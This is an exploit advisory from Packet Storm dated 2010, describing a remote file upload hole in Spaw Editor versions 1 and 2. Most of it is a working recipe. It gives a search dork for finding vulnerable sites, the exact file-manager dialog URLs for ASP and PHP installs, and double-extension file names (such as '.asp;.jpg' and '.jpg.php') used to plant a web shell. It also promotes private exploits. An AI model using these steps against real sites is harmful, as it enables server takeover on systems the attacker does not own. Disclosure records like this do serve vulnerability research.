Spaw Editor versions 1.0 and 2.0 suffer from a shell upload vulnerability.
fd6851adc58463e2980f670e9152c7c1b3e285c27b0ef5da21ab4cc795487ee6
# Tilte: Spaw Editor v1.0 & 2.0 Remote File Upload .
# Date....................: [20-05-2010]
# Author..................: [Ma3sTr0-Dz]
# Location ...............: [Algeria]
# Software ...............: [Spaw Editor v1 & v2]
# Impact..................: [Remote]
# Site Software ..........: [http://www.spaweditor.com]
# Sptnx ..................: [CmOs_Clr & Sec4ever Memberz.]
# Home : .................: [Www.Sec4ever.Com/home/ For Latest 2010 Localz & priv8 Exploits !]
# Contact me : ...........: [o5m@hotmail.de]
# Vulnerability: Remote File Upload .
# Part ExplOit & Bug Codes :
Dork [ allinurl:spaw2/dialogs/ ]
Exploit :
For Windows & ASP Sites :
/spaw2/dialogs/dialog.aspx?module=spawfm&dialog=spawfm&theme=spaw2&lang=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=images
/spaw2/uploads/files/sec4ever.asp;.jpg
=====================================
For Linux PHP :
/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=en&charset=utf-8&scid=2d0650b7920a4fbf87598f8d58b4a99b&type=files
/spaw2/uploads/files/sec4ever.jpg.php
=====================================
Special Thanks to : Exploit-db Team & Www.Sec4ever.com/home [ Latest Shellcodez - Security News - Priv8 Exploits &
Localz ] .
_________________________________________________________________
Votre messagerie et bien plus où que vous soyez. Passez à Windows Live Hotmail, c'est gratuit !
https://signup.live.com/signup.aspx?id=60969
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed